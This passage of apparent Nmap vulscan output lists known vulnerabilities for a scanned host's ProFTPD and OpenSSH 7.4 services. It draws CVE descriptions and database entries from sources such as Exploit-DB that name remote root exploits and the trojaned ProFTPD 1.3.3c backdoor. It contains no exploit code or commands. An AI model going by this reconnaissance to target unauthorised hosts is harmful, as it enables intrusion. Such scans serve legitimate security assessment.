10612| [CVE-2010-4562] Microsoft Windows 2008, 7, Vista, 2003, 2000, and XP, when using IPv6, allows remote attackers to determine whether a host is sniffing the network by sending an ICMPv6 Echo Request to a multicast address and determining whether an Echo Reply is sent, as demonstrated by thcping. NOTE: due to a typo, some sources map CVE-2010-4562 to a ProFTPd mod_sql vulnerability, but that issue is covered by CVE-2010-4652.
10613| [CVE-2010-4221] Multiple stack-based buffer overflows in the pr_netio_telnet_gets function in netio.c in ProFTPD before 1.3.3c allow remote attackers to execute arbitrary code via vectors involving a TELNET IAC escape character to a (1) FTP or (2) FTPS server.
10614| [CVE-2010-4052] Stack consumption vulnerability in the regcomp implementation in the GNU C Library (aka glibc or libc6) through 2.11.3, and 2.12.x through 2.12.2, allows context-dependent attackers to cause a denial of service (resource exhaustion) via a regular expression containing adjacent repetition operators, as demonstrated by a {10,}{10,}{10,}{10,} sequence in the proftpd.gnu.c exploit for ProFTPD.
10615| [CVE-2010-4051] The regcomp implementation in the GNU C Library (aka glibc or libc6) through 2.11.3, and 2.12.x through 2.12.2, allows context-dependent attackers to cause a denial of service (application crash) via a regular expression containing adjacent bounded repetitions that bypass the intended RE_DUP_MAX limitation, as demonstrated by a {10,}{10,}{10,}{10,}{10,} sequence in the proftpd.gnu.c exploit for ProFTPD, related to a "RE_DUP_MAX overflow."
10616| [CVE-2010-3867] Multiple directory traversal vulnerabilities in the mod_site_misc module in ProFTPD before 1.3.3c allow remote authenticated users to create directories, delete directories, create symlinks, and modify file timestamps via directory traversal sequences in a (1) SITE MKDIR, (2) SITE RMDIR, (3) SITE SYMLINK, or (4) SITE UTIME command.
10617| [CVE-2009-3639] The mod_tls module in ProFTPD before 1.3.2b, and 1.3.3 before 1.3.3rc2, when the dNSNameRequired TLS option is enabled, does not properly handle a '\0' character in a domain name in the Subject Alternative Name field of an X.509 client certificate, which allows remote attackers to bypass intended client-hostname restrictions via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408.
10618| [CVE-2009-0919] XAMPP installs multiple packages with insecure default passwords, which makes it easier for remote attackers to obtain access via (1) the "lampp" default password for the "nobody" account within the included ProFTPD installation, (2) a blank default password for the "root" account within the included MySQL installation, (3) a blank default password for the "pma" account within the phpMyAdmin installation, and possibly other unspecified passwords. NOTE: this was originally reported as a problem in DFLabs PTK, but this issue affects any product that is installed within the XAMPP environment, and should not be viewed as a vulnerability within that product. NOTE: DFLabs states that PTK is intended for use in a laboratory with "no contact from / to internet."
10619| [CVE-2009-0543] ProFTPD Server 1.3.1, with NLS support enabled, allows remote attackers to bypass SQL injection protection mechanisms via invalid, encoded multibyte characters, which are not properly handled in (1) mod_sql_mysql and (2) mod_sql_postgres.
10620| [CVE-2009-0542] SQL injection vulnerability in ProFTPD Server 1.3.1 through 1.3.2rc2 allows remote attackers to execute arbitrary SQL commands via a "%" (percent) character in the username, which introduces a "'" (single quote) character during variable substitution by mod_sql.
10621| [CVE-2008-7265] The pr_data_xfer function in ProFTPD before 1.3.2rc3 allows remote authenticated users to cause a denial of service (CPU consumption) via an ABOR command during a data transfer.
10622| [CVE-2008-4242] ProFTPD 1.3.1 interprets long commands from an FTP client as multiple commands, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks and execute arbitrary FTP commands via a long ftp:// URI that leverages an existing session from the FTP client implementation in a web browser.
10623| [CVE-2007-2165] The Auth API in ProFTPD before 20070417, when multiple simultaneous authentication modules are configured, does not require that the module that checks authentication is the same as the module that retrieves authentication data, which might allow remote attackers to bypass authentication, as demonstrated by use of SQLAuthTypes Plaintext in mod_sql, with data retrieved from /etc/passwd.
10624| [CVE-2006-6563] Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls.c in the mod_ctrls module in ProFTPD before 1.3.1rc1 allows local users to execute arbitrary code via a large reqarglen length value.
10625| [CVE-2006-6171] ** DISPUTED ** ProFTPD 1.3.0a and earlier does not properly set the buffer size limit when CommandBufferSize is specified in the configuration file, which leads to an off-by-two buffer underflow. NOTE: in November 2006, the role of CommandBufferSize was originally associated with CVE-2006-5815, but this was an error stemming from a vague initial disclosure. NOTE: ProFTPD developers dispute this issue, saying that the relevant memory location is overwritten by assignment before further use within the affected function, so this is not a vulnerability.
10626| [CVE-2006-6170] Buffer overflow in the tls_x509_name_oneline function in the mod_tls module, as used in ProFTPD 1.3.0a and earlier, and possibly other products, allows remote attackers to execute arbitrary code via a large data length argument, a different vulnerability than CVE-2006-5815.
10627| [CVE-2006-5815] Stack-based buffer overflow in the sreplace function in ProFTPD 1.3.0 and earlier allows remote attackers, probably authenticated, to cause a denial of service and execute arbitrary code, as demonstrated by vd_proftpd.pm, a "ProFTPD remote exploit."
10628| [CVE-2005-4816] Buffer overflow in mod_radius in ProFTPD before 1.3.0rc2 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long password.
10629| [CVE-2005-2390] Multiple format string vulnerabilities in ProFTPD before 1.3.0rc2 allow attackers to cause a denial of service or obtain sensitive information via (1) certain inputs to the shutdown message from ftpshut, or (2) the SQLShowInfo mod_sql directive.
10630| [CVE-2005-0484] Format string vulnerability in gprostats for GProFTPD before 8.1.9 may allow remote attackers to execute arbitrary code via an FTP transfer with a crafted filename that causes format string specifiers to be inserted into the ProFTPD transfer log.
10631| [CVE-2004-1602] ProFTPD 1.2.x, including 1.2.8 and 1.2.10, responds in a different amount of time when a given username exists, which allows remote attackers to identify valid usernames by timing the server response.
10632| [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
10633| [CVE-2004-0432] ProFTPD 1.2.9 treats the Allow and Deny directives for CIDR based ACL entries as if they were AllowAll, which could allow FTP clients to bypass intended access restrictions.
10634| [CVE-2004-0346] Off-by-one buffer overflow in _xlate_ascii_write() in ProFTPD 1.2.7 through 1.2.9rc2p allows local users to gain privileges via a 1024 byte RETR command.
10635| [CVE-2003-0831] ProFTPD 1.2.7 through 1.2.9rc2 does not properly translate newline characters when transferring files in ASCII mode, which allows remote attackers to execute arbitrary code via a buffer overflow using certain files.
10636| [CVE-2003-0500] SQL injection vulnerability in the PostgreSQL authentication module (mod_sql_postgres) for ProFTPD before 1.2.9rc1 allows remote attackers to execute arbitrary SQL and gain privileges by bypassing authentication or stealing passwords via the USER name.
10637| [CVE-2001-1501] The glob functionality in ProFTPD 1.2.1, and possibly other versions allows remote attackers to cause a denial of service (CPU and memory consumption) via commands with large numbers of wildcard and other special characters, as demonstrated using an ls command with multiple (1) "*/..", (2) "*/.*", or (3) ".*./*?/" sequences in the argument.
10638| [CVE-2001-1500] ProFTPD 1.2.2rc2, and possibly other versions, does not properly verify reverse-resolved hostnames by performing forward resolution, which allows remote attackers to bypass ACLs or cause an incorrect client hostname to be logged.
10639| [CVE-2001-0456] postinst installation script for Proftpd in Debian 2.2 does not properly change the "run as uid/gid root" configuration when the user enables anonymous access, which causes the server to run at a higher privilege than intended.
10640| [CVE-2001-0318] Format string vulnerability in ProFTPD 1.2.0rc2 may allow attackers to execute arbitrary commands by shutting down the FTP server while using a malformed working directory (cwd).
10641| [CVE-2001-0136] Memory leak in ProFTPd 1.2.0rc2 allows remote attackers to cause a denial of service via a series of USER commands, and possibly SIZE commands if the server has been improperly installed.
10642| [CVE-2001-0027] mod_sqlpw module in ProFTPD does not reset a cached password when a user uses the "user" command to change accounts, which allows authenticated attackers to gain privileges of other users.
10643| [CVE-2000-0574] FTP servers such as OpenBSD ftpd, NetBSD ftpd, ProFTPd and Opieftpd do not properly cleanse untrusted format strings that are used in the setproctitle function (sometimes called by set_proc_title), which allows remote attackers to cause a denial of service or execute arbitrary commands.
10644| [CVE-1999-1475] ProFTPd 1.2 compiled with the mod_sqlpw module records user passwords in the wtmp log file, which allows local users to obtain the passwords and gain privileges by reading wtmp, e.g. via the last command.
10645| [CVE-1999-0911] Buffer overflow in ProFTPD, wu-ftpd, and beroftpd allows remote attackers to gain root access via a series of MKD and CWD commands that create nested directories.
10646| [CVE-1999-0368] Buffer overflows in wuarchive ftpd (wu-ftpd) and ProFTPD lead to remote root access, a.k.a. palmetto.
10647|
10648| SecurityFocus - https://www.securityfocus.com/bid/:
10649| [97409] ProFTPD CVE-2017-7418 Local Security Bypass Vulnerability
10650| [89750] ProFTPD CVE-2001-1501 Denial-Of-Service Vulnerability
10651| [88575] ProFTPD CVE-2001-0027 Denial-Of-Service Vulnerability
10652| [84378] Proftpd CVE-2008-7265 Denial-Of-Service Vulnerability
10653| [84329] ProFTPD Out Of Bounds Multiple Memory Corruption Vulnerabilities
10654| [84327] ProFTPD CVE-2016-3125 Diffie Hellman Key Exchange Security Bypass Vulnerability
10655| [82756] ProFTPD CVE-2003-0500 SQL-Injection Vulnerability
10656| [82433] GProFTPD CVE-2005-0484 Remote Security Vulnerability
10657| [77684] ProFTPD Heap Buffer Overflow and Denial of Service Vulnerabilities
10658| [74238] ProFTPD CVE-2015-3306 Information Disclosure Vulnerabilities
10659| [62328] ProFTPD 'mod_sftp_pam' Remote Denial of Service Vulnerability
10660| [57172] ProFTPD Race Condition Local Privilege Escalation Vulnerability
10661| [50631] ProFTPD Prior To 1.3.3g Use-After-Free Remote Code Execution Vulnerability
10662| [46183] ProFTPD 'mod_sftp' Module Integer Overflow Vulnerability
10663| [45150] ProFTPD Backdoor Unauthorized Access Vulnerability
10664| [44933] ProFTPD 'mod_sql' Remote Heap Based Buffer Overflow Vulnerability
10665| [44562] ProFTPD Multiple Remote Vulnerabilities
10666| [36804] ProFTPD mod_tls Module NULL Character CA SSL Certificate Validation Security Bypass Vulnerability
10667| [33722] ProFTPD 'mod_sql' Username SQL Injection Vulnerability
10668| [33650] ProFTPD Character Encoding SQL Injection Vulnerability
10669| [23546] ProFTPD AUTH Multiple Authentication Module Security Bypass Vulnerability
10670| [21587] ProFTPD Controls Module Local Buffer Overflow Vulnerability
10671| [21326] ProFTPD MOD_TLS Remote Buffer Overflow Vulnerability
10672| [20992] ProFTPD SReplace Remote Buffer Overflow Vulnerability
10673| [16535] ProFTPD Mod_Radius Buffer Overflow Vulnerability
10674| [14381] ProFTPD Shutdown Message Format String Vulnerability
10675| [14380] ProFTPD SQLShowInfo SQL Output Format String Vulnerability
10676| [12588] GProFTPD GProstats Remote Format String Vulnerability
10677| [11430] ProFTPD Authentication Delay Username Enumeration Vulnerability
10678| [10252] ProFTPD CIDR Access Control Rule Bypass Vulnerability
10679| [9782] ProFTPD _xlate_ascii_write() Buffer Overrun Vulnerability
10680| [8679] ProFTPD ASCII File Transfer Buffer Overrun Vulnerability
10681| [7974] ProFTPD SQL Injection mod_sql Vulnerability
10682| [6781] ProFTPD 1.2.0rc2 log_pri() Format String Vulnerability
10683| [6341] ProFTPD STAT Command Denial Of Service Vulnerability
10684| [3310] ProFTPD Client Hostname Resolving Vulnerability
10685| [2366] ProFTPD USER Remote Denial of Service Vulnerability
10686| [2185] ProFTPD SIZE Remote Denial of Service Vulnerability
10687| [812] ProFTPD mod_sqlpw Vulnerability
10688| [650] ProFTPD snprintf Vulnerability
10689| [612] ProFTPD Remote Buffer Overflow
10690|
10691| IBM X-Force - https://exchange.xforce.ibmcloud.com:
10692| [80980] ProFTPD FTP commands symlink
10693| [71226] ProFTPD pool code execution
10694| [65207] ProFTPD mod_sftp module denial of service
10695| [64495] ProFTPD sql_prepare_where() buffer overflow
10696| [63658] ProFTPD FTP server backdoor
10697| [63407] mod_sql module for ProFTPD buffer overflow
10698| [63155] ProFTPD pr_data_xfer denial of service
10699| [62909] ProFTPD mod_site_misc directory traversal
10700| [62908] ProFTPD pr_netio_telnet_gets() buffer overflow
10701| [53936] ProFTPD mod_tls SSL certificate security bypass
10702| [48951] ProFTPD mod_sql username percent SQL injection
10703| [48558] ProFTPD NLS support SQL injection protection bypass
10704| [45274] ProFTPD URL cross-site request forgery
10705| [33733] ProFTPD Auth API security bypass
10706| [31461] ProFTPD mod_radius buffer overflow
10707| [30906] ProFTPD Controls (mod_ctrls) module buffer overflow
10708| [30554] ProFTPD mod_tls module tls_x509_name_oneline() buffer overflow
10709| [30147] ProFTPD sreplace() buffer overflow
10710| [21530] ProFTPD mod_sql format string attack
10711| [21528] ProFTPD shutdown message format string attack
10712| [19410] GProFTPD file name format string attack
10713| [18453] ProFTPD SITE CHGRP command allows group ownership modification
10714| [17724] ProFTPD could allow an attacker to obtain valid accounts
10715| [16038] ProFTPD CIDR entry ACL bypass
10716| [15387] ProFTPD off-by-one _xlate_ascii_write function buffer overflow
10717| [12369] ProFTPD mod_sql SQL injection
10718| [12200] ProFTPD ASCII file newline buffer overflow
10719| [10932] ProFTPD long PASS command buffer overflow
10720| [8332] ProFTPD mod_sqlpw stores passwords in the wtmp log file
10721| [7818] ProFTPD ls "
10722| [7816] ProFTPD file globbing denial of service
10723| [7126] ProFTPD fails to resolve hostnames
10724| [6433] ProFTPD format string
10725| [6209] proFTPD /var symlink
10726| [6208] ProFTPD contains configuration error in postinst script when running as root
10727| [5801] proftpd memory leak when using SIZE or USER commands
10728| [5737] ProFTPD system using mod_sqlpw unauthorized access
10729|
10730| Exploit-DB - https://www.exploit-db.com:
10731| [23170] ProFTPD 1.2.7/1.2.8 ASCII File Transfer Buffer Overrun Vulnerability
10732| [22079] ProFTPD 1.2.x STAT Command Denial of Service Vulnerability
10733| [20690] wu-ftpd 2.4/2.5/2.6,Trolltech ftpd 1.2,ProFTPD 1.2,BeroFTPD 1.3.4 FTP glob Expansion Vulnerability
10734| [20536] ProFTPD 1.2 SIZE Remote Denial of Service Vulnerability
10735| [19503] ProFTPD 1.2 pre6 snprintf Vulnerability
10736| [19476] ProFTPD 1.2 pre1/pre2/pre3/pre4/pre5 Remote Buffer Overflow (2)
10737| [19475] ProFTPD 1.2 pre1/pre2/pre3/pre4/pre5 Remote Buffer Overflow (1)
10738| [19087] wu-ftpd 2.4.2,SCO Open Server <= 5.0.5,ProFTPD 1.2 pre1 realpath Vulnerability (2)
10739| [19086] wu-ftpd 2.4.2,SCO Open Server <= 5.0.5,ProFTPD 1.2 pre1 realpath Vulnerability (1)
10740| [18181] FreeBSD ftpd and ProFTPd on FreeBSD Remote r00t Exploit
10741| [16921] ProFTPD-1.3.3c Backdoor Command Execution
10742| [16878] ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
10743| [16852] ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
10744| [16851] ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
10745| [16129] ProFTPD mod_sftp Integer Overflow DoS PoC
10746| [15662] ProFTPD 1.3.3c compromised source remote root Trojan
10747| [15449] ProFTPD IAC Remote Root Exploit
10748| [10044] ProFTPd 1.3.0 mod_ctrls Local Stack Overflow (opensuse)
10749| [8037] ProFTPd with mod_mysql Authentication Bypass Vulnerability
10750| [4312] ProFTPD 1.x (module mod_tls) Remote Buffer Overflow Exploit
10751| [3730] ProFTPD 1.3.0/1.3.0a (mod_ctrls) Local Overflow Exploit (exec-shield)
10752| [3333] ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit 2
10753| [3330] ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit
10754| [3021] ProFTPD <= 1.2.9 rc2 (ASCII File) Remote Root Exploit
10755| [2928] ProFTPD <= 1.3.0a (mod_ctrls support) Local Buffer Overflow PoC
10756| [2856] ProFTPD 1.3.0 (sreplace) Remote Stack Overflow Exploit (meta)
10757| [581] ProFTPD <= 1.2.10 Remote Users Enumeration Exploit
10758| [394] ProFTPd Local pr_ctrls_connect Vulnerability - ftpdctl
10759| [244] ProFTPD <= 1.2.0pre10 Remote Denial of Service Exploit
10760| [241] ProFTPD 1.2.0 (rc2) - memory leakage example Exploit
10761| [110] ProFTPD 1.2.7 - 1.2.9rc2 Remote Root & brute-force Exploit
10762| [107] ProFTPD 1.2.9rc2 ASCII File Remote Root Exploit
10763| [43] ProFTPD 1.2.9RC1 (mod_sql) Remote SQL Injection Exploit
10764|
10765| OpenVAS (Nessus) - http://www.openvas.org:
10766| [900815] ProFTPD Server Remote Version Detection
10767| [900507] ProFTPD Server SQL Injection Vulnerability
10768| [900506] ProFTPD Server Version Detection
10769| [900133] ProFTPD Long Command Handling Security Vulnerability
10770| [863897] Fedora Update for proftpd FEDORA-2011-15765
10771| [863633] Fedora Update for proftpd FEDORA-2011-15741
10772| [863630] Fedora Update for proftpd FEDORA-2011-15740
10773| [862999] Fedora Update for proftpd FEDORA-2011-5040
10774| [862992] Fedora Update for proftpd FEDORA-2011-5033
10775| [862829] Fedora Update for proftpd FEDORA-2011-0613
10776| [862828] Fedora Update for proftpd FEDORA-2011-0610
10777| [862658] Fedora Update for proftpd FEDORA-2010-17091
10778| [862546] Fedora Update for proftpd FEDORA-2010-17220
10779| [862544] Fedora Update for proftpd FEDORA-2010-17098
10780| [861120] Fedora Update for proftpd FEDORA-2007-2613
10781| [831503] Mandriva Update for proftpd MDVSA-2011:181 (proftpd)
10782| [831323] Mandriva Update for proftpd MDVSA-2011:023 (proftpd)
10783| [831242] Mandriva Update for proftpd MDVSA-2010:227 (proftpd)
10784| [830311] Mandriva Update for proftpd MDKSA-2007:130 (proftpd)
10785| [830197] Mandriva Update for proftpd MDKA-2007:089 (proftpd)
10786| [801640] ProFTPD Denial of Service Vulnerability
10787| [801639] ProFTPD Multiple Remote Vulnerabilities
10788| [103331] ProFTPD Prior To 1.3.3g Use-After-Free Remote Code Execution Vulnerability
10789| [100933] ProFTPD Backdoor Unauthorized Access Vulnerability
10790| [100316] ProFTPD mod_tls Module NULL Character CA SSL Certificate Validation Security Bypass Vulnerability
10791| [71967] Slackware Advisory SSA:2012-041-04 proftpd
10792| [70586] FreeBSD Ports: proftpd, proftpd-mysql
10793| [70560] Debian Security Advisory DSA 2346-2 (proftpd-dfsg)
10794| [70559] Debian Security Advisory DSA 2346-1 (proftpd-dfsg)
10795| [69584] Slackware Advisory SSA:2011-095-01 proftpd
10796| [69327] Debian Security Advisory DSA 2191-1 (proftpd-dfsg)
10797| [69322] Debian Security Advisory DSA 2185-1 (proftpd-dfsg)
10798| [68801] Slackware Advisory SSA:2010-357-02 proftpd
10799| [68702] FreeBSD Ports: proftpd
10800| [68697] FreeBSD Ports: proftpd
10801| [68466] Slackware Advisory SSA:2010-305-03 proftpd
10802| [66585] Fedora Core 11 FEDORA-2009-13236 (proftpd)
10803| [66583] Fedora Core 12 FEDORA-2009-13250 (proftpd)
10804| [66291] Fedora Core 10 FEDORA-2009-11666 (proftpd)
10805| [66290] Fedora Core 11 FEDORA-2009-11649 (proftpd)
10806| [66205] Debian Security Advisory DSA 1925-1 (proftpd-dfsg)
10807| [66091] Mandrake Security Advisory MDVSA-2009:288 (proftpd)
10808| [64966] Fedora Core 10 FEDORA-2009-9386 (proftpd)
10809| [63630] FreeBSD Ports: proftpd, proftpd-mysql
10810| [63573] Debian Security Advisory DSA 1727-1 (proftpd-dfsg)
10811| [63558] Gentoo Security Advisory GLSA 200903-27 (proftpd)
10812| [63497] Debian Security Advisory DSA 1730-1 (proftpd-dfsg)
10813| [63128] Fedora Core 8 FEDORA-2009-0195 (proftpd)
10814| [63119] Fedora Core 10 FEDORA-2009-0089 (proftpd)
10815| [63117] Fedora Core 9 FEDORA-2009-0064 (proftpd)
10816| [63061] Debian Security Advisory DSA 1689-1 (proftpd-dfsg)
10817| [61656] FreeBSD Ports: proftpd, proftpd-mysql
10818| [58019] Gentoo Security Advisory GLSA 200702-02 (proftpd)
10819| [57939] Gentoo Security Advisory GLSA 200611-26 (proftpd)
10820| [57786] Debian Security Advisory DSA 1245-1 (proftpd)
10821| [57725] FreeBSD Ports: proftpd, proftpd-mysql
10822| [57703] Slackware Advisory SSA:2006-335-02 proftpd
10823| [57686] Debian Security Advisory DSA 1222-2 (proftpd)
10824| [57683] Debian Security Advisory DSA 1222-1 (proftpd)
10825| [57592] Debian Security Advisory DSA 1218-1 (proftpd)
10826| [57576] FreeBSD Ports: proftpd, proftpd-mysql
10827| [55234] Debian Security Advisory DSA 795-2 (proftpd)
10828| [55007] Gentoo Security Advisory GLSA 200508-02 (proftpd)
10829| [54858] Gentoo Security Advisory GLSA 200502-26 (GProFTPD)
10830| [54569] Gentoo Security Advisory GLSA 200405-09 (proftpd)
10831| [54483] FreeBSD Ports: proftpd, proftpd-mysql
10832| [53882] Slackware Advisory SSA:2003-259-02 ProFTPD Security Advisory
10833| [53794] Debian Security Advisory DSA 032-1 (proftpd)
10834| [53791] Debian Security Advisory DSA 029-1 (proftpd)
10835| [52532] FreeBSD Ports: proftpd
10836| [52464] FreeBSD Ports: proftpd
10837| [15484] proftpd < 1.2.11 remote user enumeration
10838|
10839| SecurityTracker - https://www.securitytracker.com:
10840| [1028040] ProFTPD MKD/XMKD Race Condition Lets Local Users Gain Elevated Privileges
10841| [1026321] ProFTPD Use-After-Free Memory Error Lets Remote Authenticated Users Execute Arbitrary Code
10842| [1020945] ProFTPD Request Processing Bug Permits Cross-Site Request Forgery Attacks
10843| [1017931] ProFTPD Auth API State Error May Let Remote Users Access the System in Certain Cases
10844| [1017167] ProFTPD sreplace() Off-by-one Bug Lets Remote Users Execute Arbitrary Code
10845| [1012488] ProFTPD SITE CHGRP Command Lets Remote Authenticated Users Modify File/Directory Group Ownership
10846| [1011687] ProFTPd Login Timing Differences Disclose Valid User Account Names to Remote Users
10847| [1009997] ProFTPD Access Control Bug With CIDR Addresses May Let Remote Authenticated Users Access Files
10848| [1009297] ProFTPD _xlate_ascii_write() Off-By-One Buffer Overflows Let Remote Users Execute Arbitrary Code With Root Privileges
10849| [1007794] ProFTPD ASCII Mode File Upload Buffer Overflow Lets Certain Remote Users Execute Arbitrary Code
10850| [1007020] ProFTPD Input Validation Flaw When Authenticating Against Postgresql Using 'mod_sql' Lets Remote Users Gain Access
10851| [1003019] ProFTPD FTP Server May Allow Local Users to Execute Code on the Server
10852| [1002354] ProFTPD Reverse DNS Feature Fails to Check Forward-to-Reverse DNS Mappings
10853| [1002148] ProFTPD Site and Quote Commands May Allow Remote Users to Execute Arbitrary Commands on the Server
10854|
10855| OSVDB - http://www.osvdb.org:
10856| [89051] ProFTPD Multiple FTP Command Handling Symlink Arbitrary File Overwrite
10857| [77004] ProFTPD Use-After-Free Response Pool Allocation List Parsing Remote Memory Corruption
10858| [70868] ProFTPD mod_sftp Component SSH Payload DoS
10859| [70782] ProFTPD contrib/mod_sql.c sql_prepare_where Function Crafted Username Handling Remote Overflow
10860| [69562] ProFTPD on ftp.proftpd.org Compromised Source Packages Trojaned Distribution
10861| [69200] ProFTPD pr_data_xfer Function ABOR Command Remote DoS
10862| [68988] ProFTPD mod_site_misc Module Multiple Command Traversal Arbitrary File Manipulation
10863| [68985] ProFTPD netio.c pr_netio_telnet_gets Function TELNET_IAC Escape Sequence Remote Overflow
10864| [59292] ProFTPD mod_tls Module Certificate Authority (CA) subjectAltName Field Null Byte Handling SSL MiTM Weakness
10865| [57311] ProFTPD contrib/mod_ratio.c Multiple Unspecified Buffer Handling Issues
10866| [57310] ProFTPD Multiple Unspecified Overflows
10867| [57309] ProFTPD src/support.c Unspecified Buffer Handling Issue
10868| [57308] ProFTPD modules/mod_core.c Multiple Unspecified Overflows
10869| [57307] ProFTPD Multiple Modules Unspecified Overflows
10870| [57306] ProFTPD contrib/mod_pam.c Multiple Unspecified Buffer Handling Issues
10871| [57305] ProFTPD src/main.c Unspecified Overflow
10872| [57304] ProFTPD src/log.c Logfile Handling Unspecified Race Condition
10873| [57303] ProFTPD modules/mod_auth.c Unspecified Issue
10874| [51954] ProFTPD Server NLS Support mod_sql_* Encoded Multibyte Character SQL Injection Protection Bypass
10875| [51953] ProFTPD Server mod_sql username % Character Handling SQL Injection
10876| [51849] ProFTPD Character Encoding SQL Injection
10877| [51720] ProFTPD NLST Command Argument Handling Remote Overflow
10878| [51719] ProFTPD MKDIR Command Directory Name Handling Remote Overflow
10879| [48411] ProFTPD FTP Command Truncation CSRF
10880| [34602] ProFTPD Auth API Multiple Auth Module Authentication Bypass
10881| [31509] ProFTPD mod_ctrls Module pr_ctrls_recv_request Function Local Overflow
10882| [30719] mod_tls Module for ProFTPD tls_x509_name_oneline Function Remote Overflow
10883| [30660] ProFTPD CommandBufferSize Option cmd_loop() Function DoS
10884| [30267] ProFTPD src/support.c sreplace() Function Remote Overflow
10885| [23063] ProFTPD mod_radius Password Overflow DoS
10886| [20212] ProFTPD Host Reverse Resolution Failure ACL Bypass
10887| [18271] ProFTPD mod_sql SQLShowInfo Directive Format String
10888| [18270] ProFTPD ftpshut Shutdown Message Format String
10889| [14012] GProftpd gprostats Utility Log Parser Remote Format String
10890| [10769] ProFTPD File Transfer Newline Character Overflow
10891| [10768] ProFTPD STAT Command Remote DoS
10892| [10758] ProFTPD Login Timing Account Name Enumeration
10893| [10173] ProFTPD mod_sqlpw wtmp Authentication Credential Disclosure
10894| [9507] PostgreSQL Authentication Module (mod_sql) for ProFTPD USER Name Parameter SQL Injection
10895| [9163] ProFTPD MKDIR Directory Creation / Change Remote Overflow (palmetto)
10896| [7166] ProFTPD SIZE Command Memory Leak Remote DoS
10897| [7165] ProFTPD USER Command Memory Leak DoS
10898| [5744] ProFTPD CIDR IP Subnet ACL Bypass
10899| [5705] ProFTPD Malformed cwd Command Format String
10900| [5638] ProFTPD on Debian Linux postinst Installation Privilege Escalation
10901| [4134] ProFTPD in_xlate_ascii_write() Function RETR Command Remote Overflow
10902| [144] ProFTPD src/log.c log_xfer() Function Remote Overflow
10903|_
1090422/tcp open ssh OpenSSH 7.4 (protocol 2.0)
10905| vulscan: VulDB - https://vuldb.com:
10906| [130671] gsi-openssh-server 7.9p1 on Fedora /etc/gsissh/sshd_config weak authentication
10907| [130371] OpenSSH 7.9 scp Man-in-the-Middle directory traversal
10908| [130370] OpenSSH 7.9 Man-in-the-Middle spoofing
10909| [130369] OpenSSH 7.9 Encoding progressmeter.c refresh_progress_meter() spoofing
10910| [129007] OpenSSH 7.9 scp Client scp.c Filename privilege escalation
10911| [123343] OpenSSH up to 7.8 GSS2 auth-gss2.c information disclosure
10912| [123011] OpenSSH up to 7.7 auth2-gss.c Request information disclosure
10913| [112267] OpenSSH up to 7.3 sshd kex.c/packet.c NEWKEYS Message denial of service
10914| [108627] OpenSSH up to 7.5 Readonly Mode sftp-server.c process_open unknown vulnerability
10915| [94611] OpenSSH up to 7.3 Access Control privilege escalation
10916| [94610] OpenSSH up to 7.3 Shared Memory Manager privilege escalation
10917| [94608] OpenSSH up to 7.3 Unix-Domain Socket privilege escalation
10918| [94607] OpenSSH up to 7.3 Forwarded Agent Channel privilege escalation
10919| [90671] OpenSSH up to 7.2 auth-passwd.c auth_password denial of service
10920| [90405] OpenSSH up to 7.2p2 sshd information disclosure
10921| [90404] OpenSSH up to 7.2p2 sshd information disclosure
10922| [90403] OpenSSH up to 7.2p2 sshd CPU Exhaustion denial of service
10923| [89622] OpenSSH 7.2p2 Authentication Username information disclosure
10924| [81320] OpenSSH up to 7.2p1 X11 Authentication Credential xauth privilege escalation
10925| [80656] OpenBSD OpenSSH 7.1 X11 Forwarding privilege escalation
10926| [80330] OpenSSH up to 7.1p1 packet.c ssh_packet_read_poll2 memory corruption
10927|
10928| MITRE CVE - https://cve.mitre.org:
10929| [CVE-2010-4755] The (1) remote_glob function in sftp-glob.c and the (2) process_put function in sftp.c in OpenSSH 5.8 and earlier, as used in FreeBSD 7.3 and 8.1, NetBSD 5.0.2, OpenBSD 4.7, and other products, allow remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in SSH_FXP_STAT requests to an sftp daemon, a different vulnerability than CVE-2010-2632.
10930| [CVE-1999-0661] A system is running a version of software that was replaced with a Trojan Horse at one of its distribution points, such as (1) TCP Wrappers 7.6, (2) util-linux 2.9g, (3) wuarchive ftpd (wuftpd) 2.2 and 2.1f, (4) IRC client (ircII) ircII 2.2.9, (5) OpenSSH 3.4p1, or (6) Sendmail 8.12.6.
10931|
10932| SecurityFocus - https://www.securityfocus.com/bid/:
10933| [102780] OpenSSH CVE-2016-10708 Multiple Denial of Service Vulnerabilities
10934| [101552] OpenSSH 'sftp-server.c' Remote Security Bypass Vulnerability
10935| [94977] OpenSSH CVE-2016-10011 Local Information Disclosure Vulnerability
10936| [94975] OpenSSH CVE-2016-10012 Security Bypass Vulnerability
10937| [94972] OpenSSH CVE-2016-10010 Privilege Escalation Vulnerability
10938| [94968] OpenSSH CVE-2016-10009 Remote Code Execution Vulnerability
10939| [93776] OpenSSH 'ssh/kex.c' Denial of Service Vulnerability
10940| [92212] OpenSSH CVE-2016-6515 Denial of Service Vulnerability
10941| [92210] OpenSSH CBC Padding Weak Encryption Security Weakness
10942| [92209] OpenSSH MAC Verification Security Bypass Vulnerability
10943| [91812] OpenSSH CVE-2016-6210 User Enumeration Vulnerability
10944| [90440] OpenSSH CVE-2004-1653 Remote Security Vulnerability
10945| [90340] OpenSSH CVE-2004-2760 Remote Security Vulnerability
10946| [89385] OpenSSH CVE-2005-2666 Local Security Vulnerability
10947| [88655] OpenSSH CVE-2001-1382 Remote Security Vulnerability
10948| [88513] OpenSSH CVE-2000-0999 Remote Security Vulnerability
10949| [88367] OpenSSH CVE-1999-1010 Local Security Vulnerability
10950| [87789] OpenSSH CVE-2003-0682 Remote Security Vulnerability
10951| [86187] OpenSSH 'session.c' Local Security Bypass Vulnerability
10952| [86144] OpenSSH CVE-2007-2768 Remote Security Vulnerability
